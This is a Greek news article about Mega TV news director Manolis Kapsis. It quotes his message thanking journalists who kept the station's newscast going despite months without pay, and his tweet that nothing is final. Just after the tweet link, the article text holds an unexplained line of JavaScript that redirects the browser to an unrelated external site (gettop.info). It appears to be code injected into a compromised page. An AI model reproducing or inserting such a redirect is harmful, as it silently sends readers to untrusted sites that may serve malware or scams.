Καψής: Είμαστε στο Mega και συνεχίζουμε – Τίποτα δεν είναι οριστικό

0
8

 

Ο διευθυντής ειδήσεων του Mega Μανόλης Καψής ευχαρίστησε τους δημοσιογράφους που στήριξαν το δελτίο ειδήσεων, παρότι απλήρωτοι επί μήνες. Επισήμανε ότι έπρεπε να παραμείνει στον «αέρα», πρόσθεσε όμως ότι αντιλαμβάνεται την απογοήτευση και την οργή τους για τη στάση των ιδιοκτητών.

Διαβάστε το μήνυμά του:

«Ευχαριστώ όλους τους συναδέλφους που στήριξαν -αν και απλήρωτοι- το δελτίο ειδήσεων του MEGA όλους αυτούς τους μήνες. Εξακολουθώ να πιστεύω πως θα έπρεπε να παραμείνουμε στον αέρα. Αλλά καταλαβαίνω απόλυτα και την απογοήτευση και την οργή όλων σας για τη στάση της εργοδοσίας απέναντι στην επιχείρηση και τους εργαζομένους του MEGA. Δεν αποχαιρετώ κανέναν, τίποτα δεν είναι οριστικό… Εγώ θα εξακολουθώ να είμαι στο MEGA κάθε πρωί και για ο,τιδήποτε θα σας ενημερώνω αμέσως μέσω email». 

Φιλικά,
Μανόλης Καψής

Λίγο νωρίτερα είχε γράψει στην προσωπική του σελίδα στο twitter: «Αντίδοτο στην κατάθλιψη… είμαστε στο Μέγκα και συνεχίζουμε την προσπάθεια να ξαναπάρει μπρος ο σταθμός! Τίποτα δεν είναι οριστικό«.

Επίσης, δεν παρέλειψε να ευχαριστήσει τους συναδέλφους που στήριξαν το μεσημεριανό δελτίο ειδήσεων του σταθμού αν και απλήρωτοι για τέσσερις μήνες.

https://twitter.com/mankapsis/status/776329010800431104 setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here